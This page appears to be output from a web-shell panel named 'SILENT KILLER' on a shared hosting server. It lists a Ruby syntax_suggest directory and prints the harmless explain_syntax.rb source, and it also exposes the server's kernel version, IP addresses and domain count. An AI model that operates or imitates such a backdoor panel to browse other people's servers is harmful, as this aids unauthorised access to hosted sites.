SILENT KILLERPanel

Current Path: > > opt > > alt > ruby32 > share > ruby > syntax_suggest


Operation   : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Software     : Apache
Server IP    : 162.0.232.56 | Your IP: 216.73.216.111
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: //opt//alt/ruby32/share/ruby/syntax_suggest

NameTypeSizeLast ModifiedActions
capture Directory - -
api.rb File 5281 bytes April 24 2025 07:53:46.
around_block_scan.rb File 7067 bytes April 24 2025 07:53:46.
block_expand.rb File 4991 bytes April 24 2025 07:53:46.
capture_code_context.rb File 6826 bytes April 24 2025 07:53:46.
clean_document.rb File 8947 bytes April 24 2025 07:53:46.
cli.rb File 3190 bytes April 24 2025 07:53:46.
code_block.rb File 2179 bytes April 24 2025 07:53:46.
code_frontier.rb File 5752 bytes April 24 2025 07:53:46.
code_line.rb File 6615 bytes April 24 2025 07:53:46.
code_search.rb File 3908 bytes April 24 2025 07:53:46.
core_ext.rb File 3076 bytes April 24 2025 07:53:46.
display_code_with_line_numbers.rb File 1812 bytes April 24 2025 07:53:46.
display_invalid_blocks.rb File 1795 bytes April 24 2025 07:53:46.
explain_syntax.rb File 2465 bytes April 24 2025 07:53:46.
left_right_lex_count.rb File 4156 bytes April 24 2025 07:53:46.
lex_all.rb File 1145 bytes April 24 2025 07:53:46.
lex_value.rb File 1540 bytes April 24 2025 07:53:46.
parse_blocks_from_indent_line.rb File 1536 bytes April 24 2025 07:53:46.
pathname_from_message.rb File 1454 bytes April 24 2025 07:53:46.
priority_engulf_queue.rb File 1295 bytes April 24 2025 07:53:46.
priority_queue.rb File 2046 bytes April 24 2025 07:53:46.
ripper_errors.rb File 837 bytes April 24 2025 07:53:46.
scan_history.rb File 2991 bytes April 24 2025 07:53:46.
unvisited_lines.rb File 705 bytes April 24 2025 07:53:46.
version.rb File 76 bytes April 24 2025 07:53:46.

Reading File: //opt//alt/ruby32/share/ruby/syntax_suggest/explain_syntax.rb

# frozen_string_literal: true

require_relative "left_right_lex_count"

module SyntaxSuggest
  # Explains syntax errors based on their source
  #
  # example:
  #
  #   source = "def foo; puts 'lol'" # Note missing end
  #   explain ExplainSyntax.new(
  #     code_lines: CodeLine.from_source(source)
  #   ).call
  #   explain.errors.first
  #   # => "Unmatched keyword, missing `end' ?"
  #
  # When the error cannot be determined by lexical counting
  # then ripper is run against the input and the raw ripper
  # errors returned.
  #
  # Example:
  #
  #   source = "1 * " # Note missing a second number
  #   explain ExplainSyntax.new(
  #     code_lines: CodeLine.from_source(source)
  #   ).call
  #   explain.errors.first
  #   # => "syntax error, unexpected end-of-input"
  class ExplainSyntax
    INVERSE = {
      "{" => "}",
      "}" => "{",
      "[" => "]",
      "]" => "[",
      "(" => ")",
      ")" => "(",
      "|" => "|"
    }.freeze

    def initialize(code_lines:)
      @code_lines = code_lines
      @left_right = LeftRightLexCount.new
      @missing = nil
    end

    def call
      @code_lines.each do |line|
        line.lex.each do |lex|
          @left_right.count_lex(lex)
        end
      end

      self
    end

    # Returns an array of missing elements
    #
    # For example this:
    #
    #   ExplainSyntax.new(code_lines: lines).missing
    #   # => ["}"]
    #
    # Would indicate that the source is missing
    # a `}` character in the source code
    def missing
      @missing ||= @left_right.missing
    end

    # Converts a missing string to
    # an human understandable explanation.
    #
    # Example:
    #
    #   explain.why("}")
    #   # => "Unmatched `{', missing `}' ?"
    #
    def why(miss)
      case miss
      when "keyword"
        "Unmatched `end', missing keyword (`do', `def`, `if`, etc.) ?"
      when "end"
        "Unmatched keyword, missing `end' ?"
      else
        inverse = INVERSE.fetch(miss) {
          raise "Unknown explain syntax char or key: #{miss.inspect}"
        }
        "Unmatched `#{inverse}', missing `#{miss}' ?"
      end
    end

    # Returns an array of syntax error messages
    #
    # If no missing pairs are found it falls back
    # on the original ripper error messages
    def errors
      if missing.empty?
        return RipperErrors.new(@code_lines.map(&:original).join).call.errors
      end

      missing.map { |miss| why(miss) }
    end
  end
end

SILENT KILLER Tool